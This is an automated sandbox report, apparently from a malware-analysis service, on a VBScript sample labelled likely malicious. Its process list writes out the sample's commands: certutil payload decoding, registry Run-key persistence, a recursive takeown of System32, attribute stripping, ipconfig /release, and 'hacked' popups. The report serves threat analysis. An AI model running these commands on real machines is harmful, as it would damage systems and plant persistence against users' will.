Analysis Overview
SHA256
d6607a9ec5fc0698f50382ffe61a4ad1f36a8b26c0834c305f40e41647980668
Threat Level: Likely malicious
The file ADZP 20 Complex.vbs was found to be: Likely malicious.
Malicious Activity Summary
Modifies Windows Firewall
Possible privilege escalation attempt
Reads user/profile data of web browsers
Modifies file permissions
Checks computer location settings
Drops file in System32 directory
Drops autorun.inf file
Drops file in Windows directory
Enumerates physical storage devices
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Gathers network information
Kills process with taskkill
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-25 17:09
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-25 17:09
Reported
2024-05-25 17:12
Platform
win10v2004-20240508-en
Max time kernel
14s
Max time network
151s
Command Line
Signatures
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Reads user/profile data of web browsers
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\TempShingapi.sk.bat" "
C:\Windows\system32\certutil.exe
certutil -decode x.bin ADZP-20-Complex.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\notepad.exe
notepad
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
